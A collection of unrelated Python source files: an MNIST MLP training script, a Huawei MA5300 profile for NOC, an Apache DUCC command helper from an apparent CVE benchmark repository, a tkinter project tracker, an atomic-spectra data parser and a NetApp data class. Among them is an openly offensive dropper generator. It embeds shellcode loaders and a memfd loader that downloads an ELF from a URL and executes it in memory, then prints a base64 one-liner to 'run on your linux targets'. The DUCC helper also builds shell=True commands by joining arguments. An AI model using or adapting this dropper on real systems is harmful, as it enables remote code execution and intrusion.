    one_hot_targets = npdl.utils.data.one_hot(y_train)
    model.fit(X_train, one_hot_targets, max_iter=max_iter, validation_split=0.1)
def main3(max_iter):
    """Train a 200-unit MLP (string activation API) with NesterovMomentum."""
    n_classes, X_train, y_train = get_data()

    print("building model ...")
    model = npdl.Model()
    model.add(npdl.layers.Dense(n_out=200, n_in=784, activation='relu'))
    model.add(npdl.layers.Softmax(n_out=n_classes))
    model.compile(loss=npdl.objectives.SCCE(), optimizer=npdl.optimizers.NesterovMomentum())

    print("train model ... ")
    one_hot_targets = npdl.utils.data.one_hot(y_train)
    model.fit(X_train, one_hot_targets, max_iter=max_iter, validation_split=0.1)
def _train_mnist_mlp(optimizer, max_iter):
    """Train the shared 100-unit ReLU MLP on MNIST with the named optimizer.

    Args:
        optimizer: optimizer name accepted by npdl's string API (e.g. 'adam').
        max_iter: number of training iterations.
    """
    n_classes, X_train, y_train = get_data()
    print("building model ...")
    model = npdl.Model()
    model.add(npdl.layers.Dense(n_out=100, n_in=784, activation='relu'))
    model.add(npdl.layers.Softmax(n_out=n_classes))
    model.compile(loss='scce', optimizer=optimizer)
    print("train model ... ")
    model.fit(X_train, npdl.utils.data.one_hot(y_train), max_iter=max_iter,
              validation_split=0.1)
def main4(max_iter):
    # test Adagrad optimizer
    _train_mnist_mlp('adagrad', max_iter)
def main5(max_iter):
    # test RMSProp optimizer
    _train_mnist_mlp('rmsprop', max_iter)
def main6(max_iter):
    # test Adadelta optimizer
    _train_mnist_mlp('adadelta', max_iter)
def main7(max_iter):
    # test Adam optimizer
    _train_mnist_mlp('adam', max_iter)
def main8(max_iter):
    # test Adamax optimizer
    _train_mnist_mlp('adamax', max_iter)
if __name__ == '__main__':
    main8(50)
|
# ---------------------------------------------------------------------
# Vendor: Huawei
# OS: MA5300
# ---------------------------------------------------------------------
# Copyright (C) 2007-2020 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Python modules
import re
# NOC modules
from noc.core.profile.base import BaseProfile
class Profile(BaseProfile):
    """NOC SA profile for the Huawei MA5300: CLI prompts/pagination and SNMP tuning."""
    name = "Huawei.MA5300"
    # Pager prompts and the keystroke sent to continue output.
    pattern_more = [
        (rb"--- More:", b" "),
        (rb"[ ]+---- More \(Press CTRL\+C break\) ---[ ]+", b" "),  # [ ]+ use for save \n in output
        # stream, because more pattern remove from stream
        (rb"Note: Terminal", b"\n"),
        (rb"Warning: Battery is low power!", b"\n"),
        (rb"\{\s<cr>.*\s\}:", b"\n"),
        (rb"^Are you sure?\[Y/N\]", b"y\n"),
        (rb"^\{ terminal\<K\> \}\:", b"terminal\n"),
        (rb"\{ <cr>\|interface<K> \}\:", b"\n"),
    ]
    pattern_username = rb"^Username:"
    pattern_password = rb"^Password:"
    command_exit = "logout"
    command_super = b"enable"
    command_enter_config = "configure terminal"
    command_leave_config = "end"
    command_save_config = "save"
    enable_cli_session = False  # With False mixin commands output over script
    pattern_prompt = rb"(?P<hostname>\S+)(?:\(.*)?#"
    pattern_unprivileged_prompt = rb"^(?P<hostname>[a-zA-Z0-9-_\.\/()]+)(?:-[a-zA-Z0-9/]+)*>$"
    pattern_syntax_error = (
        rb"(% Unknown command, the error locates at \'^\'| Logged Fail!|"
        rb"System is busy, please try after a while)"
    )
    # Noise the device injects into the stream; stripped before parsing.
    rogue_chars = [
        re.compile(br"\x1b\[39D\s+\x1b\[39D"),
        re.compile(br"\n\r\s+Line \d+ operating, attempt of the Line -\d+ denied!\n\r"),
        re.compile(br"\r\n\s+Note: Terminal users login \(IP: \S+ \)"),
        re.compile(br"\r\nWarning: Battery is low power!"),
        b"\r",
    ]
    # to one SNMP GET request
    snmp_metrics_get_chunk = 30
    # Timeout for snmp GET request
    snmp_metrics_get_timeout = 5
    # to one SNMP GET request for get_interface_status_ex
    snmp_ifstatus_get_chunk = 30
    # Timeout for snmp GET request for get_interface_status_ex
    snmp_ifstatus_get_timeout = 3
    # Map of interface-name prefixes (first 3 chars, lowercase) to NOC types.
    _IF_TYPES = {
        "aux": "other",
        "loo": "loopback",
        "m-e": "management",
        "nul": "null",
        "vla": "SVI",
    }
    @classmethod
    def get_interface_type(cls, name):
        # Unknown prefixes fall back to "unknown".
        return cls._IF_TYPES.get(name[:3].lower(), "unknown")
    def get_interface_snmp_index(self, name):
        # No name->ifIndex mapping is available for this platform.
        return None
    # def setup_session(self, script):
    #     script.cli("terminal type vt100", ignore_errors=True)
    #     script.cli("config", ignore_errors=True)
    #     script.cli("line vty 0 3", ignore_errors=True)
    #     script.cli("history size 0", ignore_errors=True)
    #     script.cli("length 0", ignore_errors=True)
    #     script.cli("exit", ignore_errors=True)
    #     script.cli("cls", ignore_errors=True)
    # def shutdown_session(self, script):
    #     script.cli("config", ignore_errors=True)
    #     script.cli("line vty 0 3", ignore_errors=True)
    #     script.cli("no length 0", ignore_errors=True)
    #     script.cli("exit", ignore_errors=True)
|
<reponame>ossf-cve-benchmark/CVE-2018-8035
#!/usr/bin/python
# -----------------------------------------------------------------------
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# -----------------------------------------------------------------------
import os
import sys
import string
import subprocess
import re
import zipfile
import platform
from properties import *
def find_ducc_home():
    """Infer DUCC_HOME as the grandparent directory of this script.

    The environment variable is deliberately not consulted (it may be stale).
    """
    script_path = os.path.abspath(__file__)
    last_slash = script_path.rindex('/')
    second_last_slash = script_path.rindex('/', 0, last_slash)
    return script_path[:second_last_slash]
def find_localhost():
    """Return this machine's hostname (the nodename field of uname)."""
    nodename = os.uname()[1]
    return nodename
def which(file):
    """Return the full path of `file` on $PATH, or None when not found."""
    for directory in os.environ["PATH"].split(":"):
        candidate = directory + "/" + file
        if os.path.exists(candidate):
            return candidate
    return None
class DuccBase:
    # Base helper for DUCC command-line tools: loads ducc.properties,
    # locates the JVM, and wires up CLASSPATH/JAVA_HOME.
    # NOTE: this file is Python 2 (print statements, dict.has_key).
    def read_properties(self):
        # Load ducc.properties (optionally merging site/default files first)
        # and cache the webserver node and JVM path.
        if ( self.do_merge ):
            self.merge_properties()
        self.ducc_properties = Properties()
        self.ducc_properties.put('ducc.home', self.DUCC_HOME)
        self.ducc_properties.put('DUCC_HOME', self.DUCC_HOME)
        self.ducc_properties.load(self.propsfile)
        self.webserver_node = self.ducc_properties.get('ducc.ws.node')
        self.jvm = self.ducc_properties.get('ducc.jvm')
    def java(self):
        # Path to the configured JVM binary (from ducc.jvm).
        return self.jvm
    def java_home(self):
        # Derive JAVA_HOME from the JVM binary path (grandparent directory).
        if ( os.environ.has_key('DUCC_POST_INSTALL') ):
            return 'JAVA_HOME'    # avoid npe during first-time setup
        if ( self.system == 'Darwin' ):
            self.jvm_home = "/Library/Java/Home"
        else:
            ndx = self.jvm.rindex('/')
            ndx = self.jvm.rindex('/', 0, ndx)
            self.jvm_home = self.jvm[:ndx]
        return self.jvm_home
    def version(self):
        # Ask the DUCC jar for its version string.
        lines = self.popen(self.jvm, ' org.apache.uima.ducc.common.utils.Version')
        line = lines.readline().strip()
        return "DUCC Version", line
    # simply spawn-and-forget using Python preferred mechanism
    def spawn(self, *CMD):
        cmd = ' '.join(CMD)
        # print '**** spawn', cmd, '****'
        ducc = subprocess.Popen(cmd, shell=True)
        pid = ducc.pid
        try:
            status = os.waitpid(pid, 0)
        except KeyboardInterrupt:
            print 'KeyboardInterrupt'
        except:
            print "Unexpected exception: ", sys.exc_info()[0]
        return pid
    def popen(self, *CMD):
        # Run a command and return its combined stdout/stderr stream.
        cmd = ' '.join(CMD)
        #print 'POPEN:', cmd
        proc = subprocess.Popen(cmd, bufsize=0, stdout=subprocess.PIPE, shell=True, stderr=subprocess.STDOUT)
        return proc.stdout
    def format_classpath(self, cp):
        # Print one classpath entry per line (debug aid).
        strings = cp.split(':')
        for s in strings:
            print s
    def set_classpath(self):
        # Only the submit jar is needed by the CLI tools.
        ducc_home = self.DUCC_HOME
        LIB       = ducc_home + '/lib'
        CLASSPATH = LIB + '/ducc-submit.jar'
        os.environ['CLASSPATH'] = CLASSPATH
    def mkargs(self, args):
        '''
        The cli needs to insure all args are fully quoted so the shell doesn't
        lose the proper tokenization.  This quotes everything.
        '''
        answer = []
        for a in args:
            arg = '"' + a + '"'
            answer.append(arg)
        return answer
    def __init__(self, merge=False):
        # Resolve paths, load properties, and export JAVA_HOME/CLASSPATH
        # for any child processes spawned later.
        self.DUCC_HOME = find_ducc_home()
        self.do_merge = merge
        self.ducc_properties = None
        self.system = platform.system()
        self.jvm = None
        self.webserver_node = 'localhost'
        self.propsfile = self.DUCC_HOME + '/resources/ducc.properties'
        self.localhost = find_localhost()
        self.read_properties()
        os.environ['JAVA_HOME'] = self.java_home()
        self.set_classpath()
if __name__ == "__main__":
    # Instantiating DuccBase loads ducc.properties and exports JAVA_HOME/CLASSPATH.
    base = DuccBase()
|
<filename>src/main.py<gh_stars>1-10
from tkinter import filedialog , Button, W, E, Label, Tk, messagebox
from informationgetter import InformationGetter
from pathgetter import getprojectspath, getprojectspath_window, filepath_status
from datetime import datetime
import tzlocal
import json
# window creation
root = Tk()
root.title("ProjectManager")
root.configure(background="#1abc9c")
# needed global variables
rownum = 1  # next free grid row while building the folder table
local_timezone = tzlocal.get_localzone()  # for rendering mtimes in local time
folder_id = 0  # loop counter over the project folders
label_dict = {}  # folder name -> status Label
label_list = []  # status Labels indexed by folder_id (used by change_status)
def change_status(folder_id):
    """Toggle 'In progress'/'Done' for the folder at `folder_id`,
    persist the statuses file, and refresh the on-screen label.
    """
    print("change status func")
    statuses = infoget.load_statuses()
    folders = infoget.returnlist()
    name = folders[folder_id]
    if statuses[name] == "In progress":
        statuses[name] = "Done"
    else:
        statuses[name] = "In progress"
    # FIX: use a context manager so the statuses file is flushed and closed
    # (the original passed an open() handle to json.dump and never closed it).
    with open(filepath_status, "w") as status_file:
        json.dump(statuses, status_file, indent=4)
    label_list[folder_id].configure(text=statuses[name])
    label_list[folder_id].update()
# Ask for the projects folder the first time; reuse the saved path afterwards.
if getprojectspath() == "":
    projectpath = getprojectspath_window()
else:
    projectpath = getprojectspath()
infoget = InformationGetter(projectpath)
# Header row: app title and version.
title = Label(text = "ProjectManager", font = ('Comic Sans MS', 15))
title.configure(background = "#1abc9c")
title.grid(row = 0, column = 0, columnspan = 2)
version = Label(text = "v1.1.1", font = ('Comic Sans MS', 15))
version.configure(background = "#1abc9c")
version.grid(row = 0, column = 3, sticky = E)
# Pre-format each folder's mtime in the local timezone.
last_change_time = []
for time in infoget.get_last_change_time():
    last_change_time.append(datetime.fromtimestamp(time, local_timezone).strftime('%Y-%m-%d %H:%M:%S'))
# One table row per project folder: name, mtime, status, toggle button.
while folder_id < len(infoget.returnlist()):
    folder = infoget.returnlist()[folder_id]
    # folder title
    l = Label(text = folder)
    l.configure(background = "#1abc9c", font = ("Comic Sans MS", 13))
    l.grid(row = rownum, column = 0, sticky = W)
    # last change time
    changetime = Label(text = last_change_time[folder_id])
    changetime.configure(background = "#1abc9c", font = ("Comic Sans MS", 13))
    changetime.grid(row = rownum, column = 1, sticky = E, padx = 30)
    # status
    status = Label(text = infoget.load_statuses()[folder])
    status.configure(background = "#1abc9c", font = ("Comic Sans MS", 13))
    status.grid(row = rownum, column = 2, sticky = E, padx = 30)
    label_dict[folder] = status
    label_list.append(status)
    # Default-arg trick binds the current folder_id to this button's callback.
    change_status_button = Button(text = "Change Status", command = lambda folder_id=folder_id: change_status(folder_id))
    change_status_button.configure(background = "#3498db")
    change_status_button.grid(row = rownum, column = 3)
    rownum += 1
    folder_id += 1
# Footer: path chooser and credit line.
choose_path_button = Button(text = "Choose your 'projects' folder path", command = getprojectspath_window)
choose_path_button.configure(background = "#3498db")
choose_path_button.grid(row = rownum, column = 0, sticky = W)
madeby = Label(text = "Made by Disoriented Crocodile")
madeby.configure(background = "#1abc9c", font = ("Comic Sans MS", 13))
madeby.grid(row = rownum, column = 2, sticky = E, columnspan = 2)
root.mainloop()
<filename>read_database.py
import numpy as np
import pandas as pd
import re #get rid of non-numeric strings
def fill_zeros_with_last(arr):
    """Forward-fill empty entries of *arr* in place.

    Walks the array once, remembering the most recent truthy, non-empty
    value; every falsy or empty-string element is overwritten with that
    carried value.  Leading empty entries become ``None`` because nothing
    precedes them.
    """
    carried = None
    for idx, value in enumerate(arr):
        if value and value != '':
            carried = value
        else:
            arr[idx] = carried
def load_levels_lines(B_string, second_ce, dist, database, ele_B, charge_state, I_A):
    """Load atomic energy levels (and optionally transitions) for species B.

    Reads level data from ``datatables/<B_string>cm-1.nist`` and, when
    ``dist != 0``, line/transition data from the NIST or Kurucz table
    selected by *database*.

    Args:
        B_string: element/spectrum label used to build the data file names.
        second_ce: if truthy, rebuilds B_string for a second charge exchange.
        dist: when non-zero, transition data is also loaded and the
            per-level decay list ``E_k_probs`` is returned.
        database: 'nist' or 'kurucz' — which line list to read.
        ele_B: element record providing ``ionenergies`` (mendeleev-style).
        charge_state: key into ``ele_B.ionenergies``.
        I_A: ionisation energy of species A (resonance guard below).

    Returns:
        (I_B, term, J, L, S, level, skipped_level[, E_k_probs]) — the last
        element only when ``dist != 0``.
    """
    if second_ce:
        # NOTE(review): `ele_sym_B` is not defined in this function; unless it
        # exists as a module-level global this branch raises NameError.
        # Presumably it should derive from B_string — confirm.
        B_string=ele_sym_B+'I'
    I_levels_file="datatables/"+B_string+'cm-1.nist'
    # NOTE(review): file handles opened here are never closed explicitly.
    I_levels = open(I_levels_file,'rb')
    if dist!=0:
        if database == 'nist':
            I_lines_file="datatables/"+B_string+'linescm-1.nist'
        if database == 'kurucz':
            I_lines_file="datatables/"+B_string+'Ilinescm-1.kurucz'
        try:
            I_lines = open(I_lines_file,'rb')
        except Exception as e:
            print(e)
    I_B=ele_B.ionenergies[charge_state]
    if I_A == I_B: #resonant charge exchange not treated
        # Nudge I_B so the A/B energies are never exactly equal.
        I_B=I_B+0.000005
    print("I_A:",I_A,"I_B:",I_B)
    # NIST level tables are '|'-separated with a 4-line header.
    data = np.genfromtxt(I_levels,delimiter = '|',dtype=str,skip_header=4,autostrip=1)
    data=data[np.array([len(entry) > 1 for entry in data.T[3]])]# get rid of length 0 strings i.e. empty energies
    atom_config = list(filter(None,data.T[0]))
    term = np.array(list(data.T[1]))#n.b. will have whitespace
    # term = list(data.T[1])#n.b. will have whitespace
    # Strip NIST annotation characters ([, ], ?, x, +) from J and energies.
    J = [entry.replace("[","").replace("]","").replace(" ","").replace("?","").replace("x","").replace("+","") for entry in list(data.T[2])]
    level_raw = [entry.replace("[","").replace("]","").replace(" ","").replace("?","").replace("x","").replace("+","") for entry in list(data.T[3])]
    # Propagate each term label downward over the blank rows that follow it.
    fill_zeros_with_last(term)
    if dist!=0:
        if "nist" in I_lines_file:
            print("loading transitions...")
            data = np.genfromtxt(I_lines,delimiter = '|',dtype=str,skip_header=6,autostrip=1)
            print("done loading")
            # print(data)
            A_ki = list(filter(None,data.T[3])) #s^-1
            # lines = list(filter(None,data.T[5])) #s^-1
            lines = [entry.replace("[","").replace("]","").replace(" ","").replace("?","").replace("x","").replace("+","") for entry in list(filter(None,data.T[5]))] # s-1
            # Each NIST line entry is "E_i-E_k"; split into the two energies.
            E_i=[]
            E_k=[]
            for x in lines:
                transition=x.split("-")
                E_i.append(float(transition[0]))
                E_k_val=transition[1].replace("[","").replace("]","").replace(" ","")
                # print(E_k_val)
                # E_k_val=re.sub("[^0-9]", "", transition[1])
                E_k.append(float(E_k_val))
        elif "kurucz" in I_lines_file:
            data = np.genfromtxt(I_lines,dtype=str,skip_header=4,autostrip=1) #default delimiter is strings of whitespace
            A_ki = list(filter(None,data.T[2])) #s^-1
            E_i=[float(i) for i in list(filter(None,data.T[6]))]
            E_k=[float(i) for i in list(filter(None,data.T[8]))]
            # lines=list(zip(E_i,E_k))
        else:
            print("not .nist or .kurucz??!")
    ####fills in the blanks terms and creates Ls and Ss####
    def spec_to_L(spec):
        # Map a spectroscopic letter (S, P, D, ...) to the orbital angular
        # momentum quantum number L; bracketed values like "[3/2]" are
        # evaluated numerically; anything else is returned unchanged.
        spec_dict={"S":0,"P":1,"D":2,"F":3,"G":4,"H":5,"I":6,"K":7,"L":8,"M":9}
        for letter in spec:
            if letter in spec_dict.keys():
                return spec_dict[letter]
            else:
                print("Spec notation not recognised")
        # if spec[0] =='[':
        if "[" in spec:
            val=spec[spec.index("[") + 1:spec.rindex("]")]
            return float(eval(val))
        else:
            return spec
    L, S, level, skipped_level=[], [], [], []
    for index, x in enumerate(term):
        print("term", x)
        # temp_term=x
        if x == '':
            # if J[index] != '':
            # term[index]=temp_term
            # Sentinel that deliberately fails float() below so the level is
            # routed into skipped_level.
            temp_term="thiswontfloat"
        else:
            temp_term=x
        if ' ' in temp_term: temp_term=temp_term[temp_term.index(' ')+1:] # fixes case e.g. "a 7S*", "c 5G" ...
        if J[index] != '':
            try:
                L_mom=float(spec_to_L(temp_term[1:]))
                L.append(L_mom)
                # print("level_raw[index]", level_raw[index], len(level_raw[index]))
                level.append(level_raw[index])
            except Exception as e: #if ang. mom. assignments unknown
                print(e)
                print("skipping level", temp_term)
                if level_raw[index][0] =='[':
                    val=level_raw[index][level_raw[index].index("[") + 1:level_raw[index].rindex("]")]
                    skipped_level.append(float(val))
                else:
                    # val=re.sub("[^0-9]", "", level_raw[index])
                    # skipped_level.append(float(val))
                    skipped_level.append(float(level_raw[index]))
            try:
                # Spin S from the term multiplicity digit: S = (2S+1 - 1)/2.
                S.append((int(temp_term[0])-1)/2)
            except:
                pass
        elif level_raw[index] != '':
            term[index-1]=temp_term
            try:
                L_mom=float(spec_to_L(temp_term[1:]))
                L.append(L_mom)
                level.append(level_raw[index])
            except Exception as e: #if ang. mom. assignments unknown
                print(e)
                print("skipping level", temp_term)
            try:
                S.append((int(temp_term[0])-1)/2)
            except:
                pass
    #removes leftover blanks
    term=list(filter(None,term))
    J=list(filter(None,J))
    ####fills in the blanks terms and creates Ls and Ss####
    if dist!=0:
        E_k_probs=[]#decay out of
        # For every upper level E_k, collect all decay channels out of it.
        for index_x,x in enumerate(E_k,start=0):
            for index_y,y in enumerate(E_k,start=0):
                try:
                    # NOTE(review): `E_k_lines` is never defined in this view,
                    # so this branch raises NameError every time and control
                    # always falls through to the except below — confirm
                    # whether the membership guard was ever intended to run.
                    if float(y)==float(x) and not (y in E_k_lines[0]):
                        E_k_probs.append([x,E_i[index_y],float(A_ki[index_y])])
                except: #excepts on first time
                    if float(y)==float(x):
                        E_k_probs.append([x,E_i[index_y],float(A_ki[index_y])])
                #sum_A_ki.append[x,A_ki[index_y]]
    if dist!=0:
        return I_B, term, J, L, S, level, skipped_level, E_k_probs
    else:
        return I_B, term, J, L, S, level, skipped_level
|
#!/usr/bin/env python3
'''
generate a one liner for python based shellcode delivery
'''
# pylint: disable=invalid-name, broad-except
import atexit
import base64
import readline
import sys
sc_loader_template = '''
import ctypes
import sys
from ctypes.util import find_library
PROT_READ = 0x01
PROT_WRITE = 0x02
PROT_EXEC = 0x04
MAP_PRIVATE = 0X02
MAP_ANONYMOUS = 0X20
ENOMEM = -1
SHELLCODE = "{var_0}"
libc = ctypes.CDLL(find_library('c'))
mmap = libc.mmap
mmap.argtypes = [ctypes.c_void_p, ctypes.c_size_t,
ctypes.c_int, ctypes.c_int, ctypes.c_int, ctypes.c_size_t]
mmap.restype = ctypes.c_void_p
page_size = ctypes.pythonapi.getpagesize()
sc_size = len(SHELLCODE)
mem_size = page_size * (1 + sc_size/page_size)
cptr = mmap(0, mem_size, PROT_READ | PROT_WRITE |
PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS,
-1, 0)
if cptr == ENOMEM:
sys.exit("mmap")
if sc_size <= mem_size:
ctypes.memmove(cptr, SHELLCODE, sc_size)
sc = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p)
call_sc = ctypes.cast(cptr, sc)
call_sc(None)
'''
memfd_exec_loader_template = '''
import ctypes
import urllib2
from ctypes.util import find_library
d = urllib2.urlopen('{var_0}').read()
count = len(d)
# memfd_create
syscall = ctypes.CDLL(None).syscall
syscall.restype = ctypes.c_int
syscall.argtypes = [ctypes.c_long, ctypes.c_char_p, ctypes.c_uint]
fd = syscall(319, '', 0)
# write
syscall.restype = ctypes.c_ssize_t
syscall.argtypes = [ctypes.c_long, ctypes.c_int,
ctypes.c_void_p, ctypes.c_size_t]
res = syscall(1, fd, d, count)
# execve
syscall.restype = ctypes.c_int
syscall.argtypes = [ctypes.c_long, ctypes.c_char_p, ctypes.POINTER(
ctypes.c_char_p), ctypes.POINTER(ctypes.c_char_p)]
str_arr = ctypes.c_char_p * 2
argv = str_arr()
argv[:] = [{var_1}]
res = syscall(59, "/proc/self/fd/"+str(fd), argv, None)
'''
class Dropper:
    '''
    Generate a shell command dropper using one of the python2 templates
    '''

    def __init__(self, dropper):
        """Select the template named by *dropper* and substitute its
        {var_N} placeholders with interactively collected arguments.

        dropper - template name ("shellcode" or "memfd_exec"); any other
                  value leaves the string untouched.
        """
        self.dropper = dropper
        self.args = []
        self.select_dropper()
        # BUG FIX: self.args is initialised to [] above and can never be
        # None, so the original `self.args is None` guard was dead code.
        # Warn on an *empty* args list when the chosen template expects
        # at least one placeholder.
        if not self.args and '{var_0}' in self.dropper:
            print("no args given, the dropper won't work")
        # Fill the {var_0}, {var_1}, ... slots in collection order.
        for i, var in enumerate(self.args):
            self.dropper = self.dropper.replace('{var_'+str(i)+'}', var)

    def select_dropper(self):
        '''
        Replace self.dropper with the matching template text and collect
        the template's arguments; unknown names are left unchanged.
        '''
        if self.dropper == "shellcode":
            self.dropper = sc_loader_template
            self.config_shellcode_loader()
        elif self.dropper == "memfd_exec":
            self.dropper = memfd_exec_loader_template
            self.config_memfd_exec()

    def config_shellcode_loader(self):
        '''
        Prompt for the raw shellcode hex string ({var_0}).
        '''
        shellcode = input(
            "[?] shellcode hex string (eg. \\x00\\x01): ").strip()
        self.args.append(shellcode)

    def config_memfd_exec(self):
        '''
        Prompt for the ELF URL ({var_0}) and its argv array ({var_1}).
        '''
        url = input("[?] URL to your ELF binary: ").strip()
        self.args.append(url)
        argv = input(
            "[?] argv array to run your ELF (eg. 'ls', '-lah', '/tmp'): ").strip()
        self.args.append(argv)

    def gen_cmd(self):
        '''
        Print the base64-wrapped python2 one-liner that executes the
        filled-in template on the target.
        '''
        payload = base64.b64encode(self.dropper.encode("utf-8"))
        print(
            f'''echo "exec('{payload.decode('utf-8')}'.decode('base64'))"|python''')
        print("\n\nRun this one liner on your linux targets")
print("\n\nRun this one liner on your linux targets")
# usage
# Read the template name from the command line; bail out with a short
# usage message when it is missing.
try:
    dropper_selection = sys.argv[1]
except IndexError:
    print(f"{sys.argv[0]} <shellcode/memfd_exec>")
    sys.exit(1)
def save(prev_h_len, hfile):
    '''
    Append only the history entries added during this session to *hfile*.

    prev_h_len - history length recorded at startup
    hfile      - path of the readline history file
    '''
    session_entries = readline.get_current_history_length() - prev_h_len
    readline.set_history_length(1000)
    readline.append_history_file(session_entries, hfile)
# support GNU readline interface, command history
histfile = "/tmp/.dropper_gen_history"
try:
    readline.read_history_file(histfile)
    h_len = readline.get_current_history_length()
except FileNotFoundError:
    # First run: create an empty history file so later appends succeed.
    open(histfile, 'wb').close()
    h_len = 0
# Flush this session's new history entries to disk on interpreter exit.
atexit.register(save, h_len, histfile)
try:
    # run
    dropper_gen = Dropper(dropper_selection)
    dropper_gen.gen_cmd()
except KeyboardInterrupt:
    sys.exit(0)
|
<reponame>radekg/netapp-ontap-lib-get
from netapp.igroup.initiator_info import InitiatorInfo
from netapp.netapp_object import NetAppObject
class InitiatorGroupInfo(NetAppObject):
    """
    Information about an initiator group.

    Each public attribute below is exposed as a property whose setter
    validates non-None values through NetAppObject.validate() before
    storing them on the matching private backing field.
    """
    _initiator_group_alua_enabled = None
    @property
    def initiator_group_alua_enabled(self):
        """
        Boolean value to indicate if this initiator group
        has ALUA (Asymmetric Logical Unit Access) features
        enabled for luns mapped to this initiator group.
        """
        return self._initiator_group_alua_enabled
    @initiator_group_alua_enabled.setter
    def initiator_group_alua_enabled(self, val):
        if val is not None:
            self.validate('initiator_group_alua_enabled', val)
        self._initiator_group_alua_enabled = val
    _initiator_group_throttle_borrow = None
    @property
    def initiator_group_throttle_borrow(self):
        """
        Boolean value to indicate that the igroups throttle
        reserve may be exceeded if the igroup attempts to use
        more than it has reserved.
        """
        return self._initiator_group_throttle_borrow
    @initiator_group_throttle_borrow.setter
    def initiator_group_throttle_borrow(self, val):
        if val is not None:
            self.validate('initiator_group_throttle_borrow', val)
        self._initiator_group_throttle_borrow = val
    _initiator_group_use_partner = None
    @property
    def initiator_group_use_partner(self):
        """
        Boolean value to indicate if this initiator group
        is configured for its luns to require the use of
        host multi-pathing software for correct high-availability
        failover operation.
        In Data ONTAP 7-Mode, this value is optional and
        is only returned for FCP initiator groups on an storage
        system in an HA pair.
        In Data ONTAP Cluster-Mode, this field will always be 'true'.
        """
        return self._initiator_group_use_partner
    @initiator_group_use_partner.setter
    def initiator_group_use_partner(self, val):
        if val is not None:
            self.validate('initiator_group_use_partner', val)
        self._initiator_group_use_partner = val
    _initiator_group_portset_name = None
    @property
    def initiator_group_portset_name(self):
        """
        Name of the portset that is bound to the initiator
        group, if any.
        """
        return self._initiator_group_portset_name
    @initiator_group_portset_name.setter
    def initiator_group_portset_name(self, val):
        if val is not None:
            self.validate('initiator_group_portset_name', val)
        self._initiator_group_portset_name = val
    _initiator_group_type = None
    @property
    def initiator_group_type(self):
        """
        Type of the initiators in this group.
        Possible values: "iscsi", "fcp", "mixed".
        """
        return self._initiator_group_type
    @initiator_group_type.setter
    def initiator_group_type(self, val):
        if val is not None:
            self.validate('initiator_group_type', val)
        self._initiator_group_type = val
    _initiator_group_vsa_enabled = None
    @property
    def initiator_group_vsa_enabled(self):
        """
        Boolean value to indicate if this initiator group
        has Volume Set Addressing (VSA) enabled or disabled.
        """
        return self._initiator_group_vsa_enabled
    @initiator_group_vsa_enabled.setter
    def initiator_group_vsa_enabled(self, val):
        if val is not None:
            self.validate('initiator_group_vsa_enabled', val)
        self._initiator_group_vsa_enabled = val
    _vserver = None
    @property
    def vserver(self):
        """
        Name of the vserver hosting this initiator group
        """
        return self._vserver
    @vserver.setter
    def vserver(self, val):
        if val is not None:
            self.validate('vserver', val)
        self._vserver = val
    _initiator_group_throttle_reserve = None
    @property
    def initiator_group_throttle_reserve(self):
        """
        Percentage of filer SCSI command blocks reserved
        for this initiator group's exclusive usage.
        """
        return self._initiator_group_throttle_reserve
    @initiator_group_throttle_reserve.setter
    def initiator_group_throttle_reserve(self, val):
        if val is not None:
            self.validate('initiator_group_throttle_reserve', val)
        self._initiator_group_throttle_reserve = val
    _initiator_group_os_type = None
    @property
    def initiator_group_os_type(self):
        """
        OS type of the initiator group
        """
        return self._initiator_group_os_type
    @initiator_group_os_type.setter
    def initiator_group_os_type(self, val):
        if val is not None:
            self.validate('initiator_group_os_type', val)
        self._initiator_group_os_type = val
    _lun_id = None
    @property
    def lun_id(self):
        """
        LUN identifier to which the LUN is mapped at the host.
        This value is optional and is only returned for the
        lun-map-list-info api.
        """
        return self._lun_id
    @lun_id.setter
    def lun_id(self, val):
        if val is not None:
            self.validate('lun_id', val)
        self._lun_id = val
    _initiators = None
    @property
    def initiators(self):
        """
        List of initiators belonging to this group.
        """
        return self._initiators
    @initiators.setter
    def initiators(self, val):
        if val is not None:
            self.validate('initiators', val)
        self._initiators = val
    _initiator_group_name = None
    @property
    def initiator_group_name(self):
        """
        Name of this initiator group.
        """
        return self._initiator_group_name
    @initiator_group_name.setter
    def initiator_group_name(self, val):
        if val is not None:
            self.validate('initiator_group_name', val)
        self._initiator_group_name = val
    _initiator_group_report_scsi_name_enabled = None
    @property
    def initiator_group_report_scsi_name_enabled(self):
        """
        Boolean value to indicate whether to report or hide
        SCSI Name String (8h) Descriptor to initiator's
        INQUIRY VPD 0x83 page command. This field is available in
        Data ONTAP 8.1.0 and later.
        """
        return self._initiator_group_report_scsi_name_enabled
    @initiator_group_report_scsi_name_enabled.setter
    def initiator_group_report_scsi_name_enabled(self, val):
        if val is not None:
            self.validate('initiator_group_report_scsi_name_enabled', val)
        self._initiator_group_report_scsi_name_enabled = val
    _initiator_group_uuid = None
    @property
    def initiator_group_uuid(self):
        """
        This value is Universally-unique identifier (UUID) of this
        initiator group.
        <p>
        The UUIDs are formatted as 36-character strings. These
        strings are composed of 32 hexadecimal characters
        broken up into five groupings separated by '-'s. The
        first grouping has 8 hexadecimal characters, the second through
        fourth groupings have four hexadecimal characters each, and the
        fifth and final grouping has 12 hexadecimal characters. Note
        that a leading '0x' is not used.
        <p>
        This field is available in Data ONTAP 7-mode 7.3.6, 8.0.2, 8.1.0 and later
        for the igroup-list-info API.
        This field is available in Data ONTAP Cluster-Mode 8.1.0 and later for
        the igroup-get-iter and lun-map-list-info APIs.
        <p>
        Here is an example of an actual UUID:
        <p>
        <dl>
        <dt><dd> 35d6ca90-c759-11df-8b6d-00a098132c6c </dd><br></dt>
        </dl>
        """
        return self._initiator_group_uuid
    @initiator_group_uuid.setter
    def initiator_group_uuid(self, val):
        if val is not None:
            self.validate('initiator_group_uuid', val)
        self._initiator_group_uuid = val
    @staticmethod
    def get_api_name():
